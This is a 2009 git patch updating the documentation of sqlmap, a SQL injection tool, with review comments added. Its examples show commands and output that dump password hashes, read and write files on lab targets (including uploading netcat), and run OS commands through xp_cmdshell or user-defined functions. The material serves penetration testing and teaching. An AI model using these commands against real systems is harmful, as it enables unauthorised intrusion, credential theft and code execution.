From 45e3ce798f72039976470e6514ec297133293845 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sat, 25 Jul 2009 14:31:44 +0000 Subject: [PATCH] Updated documentation with all new features introduced since sqlmap 0.7-rc1 --- doc/README.html | 1099 ++++++++++++++++++++++++++++++++++++++++++----- doc/README.pdf | Bin 357125 -> 388061 bytes doc/README.sgml | 1089 +++++++++++++++++++++++++++++++++++++++++----- 3 files changed, 1960 insertions(+), 228 deletions(-) diff --git a/doc/README.html b/doc/README.html index 291224266..d43ba51c0 100644 --- a/doc/README.html +++ b/doc/README.html @@ -98,7 +98,9 @@ for x86, AMD64 and Itanium too.

Metasploit Framework for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the download -page. The required version is 3.2 or above.

+page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline library to be able to take advantage of the sqlmap TAB completion and @@ -403,42 +405,34 @@ stand-alone executable.

3. Download and update

-

sqlmap 0.7 release candidate 1 version can be downloaded as a -source gzip compressed file or as a -source zip compressed file.

-

sqlmap can be downloaded from its -SourceForge File List page. +SourceForge File List page. It is available in various formats:

-

Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -SourceForge File List page.

-

You can also checkout the source code from the sqlmap Subversion repository to give a try to the development release:

@@ -457,8 +451,9 @@ $ svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev General Public License v2. sqlmap is copyrighted by Bernardo Damele A. G. -and -Daniele Bellucci.

+(2007-2009) and +Daniele Bellucci +(2006).

5. Usage

@@ -468,7 +463,7 @@ and
 $ python sqlmap.py -h
 
-    sqlmap/0.7rc1
+    sqlmap/0.7
     by Bernardo Damele A. G. <bernardo.damele@gmail.com>
     
 Usage: sqlmap.py [options]
@@ -551,16 +546,15 @@ Options:
     --dbs               Enumerate DBMS databases
     --tables            Enumerate DBMS database tables (opt -D)
     --columns           Enumerate DBMS database table columns (req -T opt -D)
-    --dump              Dump DBMS database table entries (req -T, opt -D, -C,
-                        --start, --stop)
+    --dump              Dump DBMS database table entries (req -T, opt -D, -C)
     --dump-all          Dump all DBMS databases tables entries
     -D DB               DBMS database to enumerate
     -T TBL              DBMS database table to enumerate
     -C COL              DBMS database table column to enumerate
     -U USER             DBMS user to enumerate
     --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
-    --start=LIMITSTART  First table entry to dump
-    --stop=LIMITSTOP    Last table entry to dump
+    --start=LIMITSTART  First query output entry to retrieve
+    --stop=LIMITSTOP    Last query output entry to retrieve
     --sql-query=QUERY   SQL statement to be executed
     --sql-shell         Prompt for an interactive SQL shell
 
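Review bot: the `--dump` help line drops `--start, --stop` from its optional arguments, while `--start` and `--stop` are reworded to "query output entry", so the usage text no longer says which options honour the range. If `--dump` still accepts them, keep them in its `opt` list; in either case name the options the range now applies to (for example `--sql-query`, if that is the intent) so the help output is self-explanatory.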
@@ -693,7 +687,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:55] [INFO] testing MySQL
@@ -706,7 +700,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 
@@ -728,7 +722,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -749,7 +743,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -771,7 +765,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -799,7 +793,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1110,7 +1104,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close 
@@ -1126,7 +1120,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1178,7 +1172,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1195,7 +1189,7 @@ Connection: close

-sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+sqlmap/0.7 (http://sqlmap.sourceforge.net)
 

@@ -1317,7 +1311,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1338,7 +1332,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1519,7 +1513,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&ca
 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)"
+  -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)"
 
 [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
 [hh:mm:40] [INFO] testing connection to the target url
@@ -1659,7 +1653,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 [...]
 [hh:mm:17] [INFO] GET parameter 'id' is custom injectable 
@@ -1736,7 +1730,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id=
 [hh:mm:50] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1758,7 +1752,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -1780,7 +1774,7 @@ Content-Type: text/html
 [hh:mm:51] [TRAFFIC OUT] HTTP request:
 GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1
 Host: 192.168.1.121:80
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2211,7 +2205,7 @@ Host: 192.168.1.121:80
 Accept-language: en-us,en;q=0.5
 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
 image/png,*/*;q=0.5
-User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)
+User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net)
 Connection: close
 
 [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200):
@@ -2393,7 +2387,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1
 [hh:mm:38] [INFO] testing Oracle
 [hh:mm:38] [INFO] confirming Oracle
 [hh:mm:38] [INFO] the back-end DBMS is Oracle
-[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1
+[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION 
+WHERE ROWNUM=1
 [hh:mm:38] [INFO] retrieved: 10
 [hh:mm:38] [INFO] performed 20 queries in 0 seconds
 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
@@ -2786,11 +2781,11 @@ management system user.

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 [*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892 + password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 [*] root [1]: - password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B + password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B [*] testuser [1]: - password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 + password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29
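Review bot: the three `password hash:` values in the `--passwords` example change by only a few hex digits each, which the subject line (documentation of new features) does not explain. If the goal is to keep real hashes out of the documentation, replace them with obviously constructed values, since most of each original digest is still present here and in the file history, and mention the change in the commit message.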

@@ -2807,12 +2802,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955
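Review bot: in the `sa` entry the new full `password hash:` value and the new split fields no longer agree. The full hash contains `...104d8ce3` and `...b62ee5d506955`, but the `mixedcase:` line ends in `104d8ee3` and the `uppercase:` line contains `b62ce5d506955`. Since the example is meant to show how the header, salt, mixedcase and uppercase parts are cut out of the one value, derive the four fields from the full hash shown so they concatenate back to it.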

@@ -2852,7 +2847,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7

@@ -3322,7 +3317,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3376,7 +3371,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3389,7 +3384,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3419,7 +3414,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ @@ -3450,7 +3445,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ 
@@ -3540,7 +3535,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3766,7 +3761,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3779,7 +3775,8 @@ MID((%s), %d, %d) ORDER BY %s ASC SELECT %s FROM %s.%s SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END) -SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND table_schema='%s' +SELECT column_name, column_type FROM information_schema.COLUMNS WHERE table_name='%s' AND +table_schema='%s' SELECT grantee FROM information_schema.USER_PRIVILEGES SELECT grantee, privilege_type FROM information_schema.USER_PRIVILEGES SELECT schema_name FROM information_schema.SCHEMATA 
@@ -3835,10 +3832,12 @@ table_schema=CHAR(116,101,115,116) LIMIT 2, 1 [hh:mm:48] [INFO] performed 55 queries in 0 seconds [hh:mm:48] [INFO] the query with column names is: SELECT id, name, surname FROM test.users [hh:mm:48] [INPUT] can the SQL query provided return multiple entries? [Y/n] y -[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM test.users +[hh:mm:04] [INFO] query: SELECT IFNULL(CAST(COUNT(id) AS CHAR(10000)), CHAR(32)) FROM +test.users [hh:mm:04] [INFO] retrieved: 5 [hh:mm:04] [INFO] performed 13 queries in 0 seconds -[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many entries +[hh:mm:04] [INPUT] the SQL query that you provide can return up to 5 entries. How many +entries do you want to retrieve? [a] All (default) [#] Specific number @@ -3853,8 +3852,8 @@ ORDER BY id ASC LIMIT 0, 1 ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: luther [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 0, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 0, 1 [hh:mm:09] [INFO] retrieved: blissett [hh:mm:09] [INFO] performed 62 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users 
@@ -3865,8 +3864,8 @@ ORDER BY id ASC LIMIT 1, 1 ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: fluffy [hh:mm:09] [INFO] performed 48 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 1, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 1, 1 [hh:mm:09] [INFO] retrieved: bunny [hh:mm:09] [INFO] performed 41 queries in 0 seconds [hh:mm:09] [INFO] query: SELECT IFNULL(CAST(id AS CHAR(10000)), CHAR(32)) FROM test.users @@ -3877,8 +3876,8 @@ ORDER BY id ASC LIMIT 2, 1 ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: wu [hh:mm:09] [INFO] performed 20 queries in 0 seconds -[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM test.users -ORDER BY id ASC LIMIT 2, 1 +[hh:mm:09] [INFO] query: SELECT IFNULL(CAST(surname AS CHAR(10000)), CHAR(32)) FROM +test.users ORDER BY id ASC LIMIT 2, 1 [hh:mm:09] [INFO] retrieved: ming [hh:mm:10] [INFO] performed 34 queries in 0 seconds SELECT * FROM test.users [3]: @@ -3904,7 +3903,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql [...] back-end DBMS: PostgreSQL -[10:11:42] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER +[10:hh:mm] [INFO] calling PostgreSQL shell. To quit type 'x' or 'q' and press ENTER sql> SELECT COUNT(name) FROM users [10:11:57] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' [10:11:57] [INPUT] can the SQL query provided return multiple entries? [Y/n] n 
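Review bot: in the hunk at `@@ -3904,7 +3903,7 @@` the timestamp is rewritten to `[10:hh:mm]`, which keeps the real hour and masks the wrong fields; every other example in this patch uses `[hh:mm:SS]`, so this should be `[hh:mm:42]`. The context lines of the same session still show `[10:11:57]`, so the remaining timestamps in this SQL shell example need the same treatment for the placeholder to be consistent.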
@@ -3917,8 +3916,8 @@ SELECT COUNT(name) FROM users: '4' sql> INSERT INTO users (id, name, surname) VALUES (5, 'from', 'sql shell'); [10:12:35] [INFO] testing stacked queries support on parameter 'id' [10:12:40] [INFO] the web application supports stacked queries on parameter 'id' -[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users (id, name, surname) -VALUES (5, 'from', 'sql shell');' +[10:12:40] [INFO] executing SQL data manipulation query: 'INSERT INTO users +(id, name, surname) VALUES (5, 'from', 'sql shell');' [10:12:40] [INFO] done sql> SELECT COUNT(name) FROM users [10:12:51] [INFO] fetching SQL SELECT statement query output: 'SELECT COUNT(name) FROM users' @@ -3951,20 +3950,22 @@ support when the back-end DBMS is PostgreSQL.

Option: --read-file

It is possible to retrieve the content of files from the underlying file -system when the back-end database management is system is either MySQL, -PostgreSQL or Microsoft SQL Server. +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a PostgreSQL 8.3.5 target:

+

Example on a PostgreSQL 8.3.5 target to retrieve a text file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
-  "C:\example.txt" -v2
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --read-file "C:\example.txt" -v 2
 
 [...]
 [hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
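Review bot: the condition added to the `--read-file` paragraph, "the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses", does not say which privileges are needed on MySQL, PostgreSQL or Microsoft SQL Server. Name them per DBMS, or point to the part of the white paper that does, so a reader can tell why a read fails. The neighbouring context sentence "sqlmap will handle either cases automatically" is left untouched by the grammar fix; "either case" would be correct.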
@@ -4022,45 +4023,98 @@ This is a text file
 

+

Example on a Microsoft SQL Server 2005 Service Pack 0 target to +retrieve a binary file:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/iis/get_str2.asp?name=luther" \
+  --read-file "C:\example.exe" --union-use -v 1
+
+[...]
+[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
+web server operating system: Windows 2000
+web application technology: ASP.NET, Microsoft IIS 6.0, ASP
+back-end DBMS: Microsoft SQL Server 2005
+
+[hh:mm:49] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing 
+technique
+[hh:mm:49] [INFO] confirming full inband sql injection on parameter 'name'
+[hh:mm:49] [WARNING] the target url is not affected by an exploitable full inband sql 
+injection vulnerability
+[hh:mm:49] [INFO] confirming partial (single entry) inband sql injection on parameter 
+'name' by appending a false condition after the parameter value
+[hh:mm:49] [INFO] the target url is affected by an exploitable partial (single entry) 
+inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION 
+ALL SELECT NULL, NULL, NULL-- AND 'sjOfJ'='sjOfJ'
+
+[hh:mm:49] [INFO] testing stacked queries support on parameter 'name'
+[hh:mm:54] [INFO] the web application supports stacked queries on parameter 'name'
+[hh:mm:54] [INFO] fetching file: 'C:/example.exe'
+[hh:mm:54] [INFO] the SQL query provided returns 3 entries
+C:/example.exe file saved to:    '/home/inquis/sqlmap/output/192.168.1.121/files/
+C__example.exe'
+
+[hh:mm:54] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/
+192.168.1.121'
+
+$ ls -l output/192.168.1.121/files/C__example.exe 
+-rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.1.121/files/C__example.exe
+
+$ file output/192.168.1.121/files/C__example.exe 
+output/192.168.1.121/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
+
+
+

+

Write a local file on the back-end DBMS file system

Options: --write-file and --dest-file

It is possible to upload a local file to the underlying file system when -the back-end database management is system is either MySQL, PostgreSQL or -Microsoft SQL Server. +the back-end database management system is either MySQL, PostgreSQL or +Microsoft SQL Server and the session user has the needed privileges to +abuse database specific functionalities and architectural weaknesses. The file specified can be either a text or a binary file, sqlmap will handle either cases automatically.

-

The techniques implemented are detailed on the white paper +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

-

Example on a MySQL 5.0.67 target:

+

Example on a MySQL 5.0.67 target to upload a binary UPX-compressed +file:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
-  "/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
+$ file /tmp/nc.exe.packed 
+/tmp/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
+
+$ ls -l /tmp/nc.exe.packed
+-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed
+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.aspx?id=1" --write-file \
+  "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
 
 [...]
-[01:12:29] [INFO] the back-end DBMS is MySQL
+[hh:mm:29] [INFO] the back-end DBMS is MySQL
 web server operating system: Windows 2003 or 2008
 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
 back-end DBMS: MySQL >= 5.0.0
 
-[01:12:29] [INFO] testing stacked queries support on parameter 'id'
-[01:12:29] [INFO] detecting back-end DBMS version from its banner
-[01:12:29] [INFO] retrieved: 5.0.67
-[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
-[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
-[01:12:36] [INFO] retrieved: C
-[01:12:36] [INFO] the back-end DBMS operating system is Windows
+[hh:mm:29] [INFO] testing stacked queries support on parameter 'id'
+[hh:mm:29] [INFO] detecting back-end DBMS version from its banner
+[hh:mm:29] [INFO] retrieved: 5.0.67
+[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id'
+[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system
+[hh:mm:36] [INFO] retrieved: C
+[hh:mm:36] [INFO] the back-end DBMS operating system is Windows
 do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully 
 written on the back-end DBMS file system? [Y/n] y
-[01:12:52] [INFO] retrieved: 31744
-[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same 
-size as the local file '/home/inquis/software/netcat/nc.exe.packed'
+[hh:mm:52] [INFO] retrieved: 31744
+[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, 
+same size as the local file '/tmp/nc.exe.packed'
 

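Review bot: in the `--write-file` example the confirmation step reports only that the remote file is 31744 bytes, "same size as the local file", and the surrounding text does not say what the confirmation covers. State in the paragraph above the example that the check shown is a size comparison and not a content comparison, so it is not read as an integrity check. The same paragraph repeats the privileges sentence from `--read-file` word for word; a single shared note referenced from both sections would be easier to keep correct.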
@@ -4069,55 +4123,850 @@ size as the local file '/home/inquis/software/netcat/nc.exe.packed'

5.9 Operating system access

-

Execute an operating system command

+

Execute arbitrary operating system command

-

Option: --os-cmd

+

Options: --os-cmd and --os-shell

-

TODO

+

It is possible to execute arbitrary commands on the underlying operating +system when the back-end database management system is either MySQL, +PostgreSQL or Microsoft SQL Server and the session user has the needed +privileges to abuse database specific functionalities and architectural +weaknesses.

-

The techniques implemented are detailed on the white paper +

On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality +demonstrated above) a shared library (binary file) containing two +user-defined functions, sys_exec() and sys_eval(), then +it creates these two functions on the database and call one of them to +execute the specified command, depending on the user's choice to display +the standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored +procedure: if it's disable sqlmap re-enables it, if it does not exist, +sqlmap creates it from scratch.

+ +

If the user wants to retrieve the command standard output, sqlmap will use +one of the enumeration SQL injection techniques (blind or inband) to +retrieve it, viceversa sqlmap will use the stacked query SQL injection +technique to execute the command without returning anything to the user.

+ +

These techniques are detailed on the white paper Advanced SQL injection to operating system full control.

+

It is possible to specify a single command to be executed with the +--os-cmd option.

-

Prompt for an interactive operating system shell

+

Example on a PostgreSQL 8.3.5 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.aspx?id=1" \
+  --os-cmd "whoami" -v 1
 
-

Option: --os-shell

+[...] +[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL +web server operating system: Windows 2003 or 2008 +web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +back-end DBMS: PostgreSQL -

TODO

